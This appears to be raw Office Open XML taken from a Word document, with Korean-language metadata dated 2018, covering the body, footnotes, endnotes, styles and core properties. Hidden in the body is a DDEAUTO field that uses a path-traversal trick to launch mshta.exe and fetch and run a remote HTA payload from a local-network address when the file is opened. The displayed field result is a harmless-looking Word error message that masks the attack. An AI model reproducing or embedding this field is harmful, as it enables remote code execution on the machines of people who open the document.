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1A09" w14:textId="4B7788D7" w:rsidR="00136AB8" w:rsidRDefault="0023526F" w:rsidP="007C305E">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="007C305E">
        <w:instrText>DDEAUTO</w:instrText>
      </w:r>
      <w:r w:rsidR="00BF10E7">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="007C305E">
        <w:instrText>C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe "http://192.168.1.101:8080/8b0HTF3MdgqYqgK</w:instrText>
      </w:r>
      <w:r w:rsidR="002C503F">
        <w:instrText>"</w:instrText>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!수식의 끝이 잘못되었습니다.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00136AB8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4811" w14:textId="77777777" w:rsidR="00536876" w:rsidRDefault="00536876" w:rsidP="00BF10E7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6A7E8D31" w14:textId="77777777" w:rsidR="00536876" w:rsidRDefault="00536876" w:rsidP="00BF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4E03F" w14:textId="77777777" w:rsidR="00536876" w:rsidRDefault="00536876" w:rsidP="00BF10E7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1BF9ED7F" w14:textId="77777777" w:rsidR="00536876" w:rsidRDefault="00536876" w:rsidP="00BF1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6F"/>
    <w:rsid w:val="00136AB8"/>
    <w:rsid w:val="0023526F"/>
    <w:rsid w:val="002C503F"/>
    <w:rsid w:val="00536876"/>
    <w:rsid w:val="007C305E"/>
    <w:rsid w:val="00BF10E7"/>
    <w:rsid w:val="00C64650"/>
    <w:rsid w:val="00D145D0"/>
    <w:rsid w:val="00E0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D786"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EE7C437B-6BC1-488E-91CD-76C4AAC1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0E7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0E7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF10E7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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>최 용</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-05T00:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-05T01:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>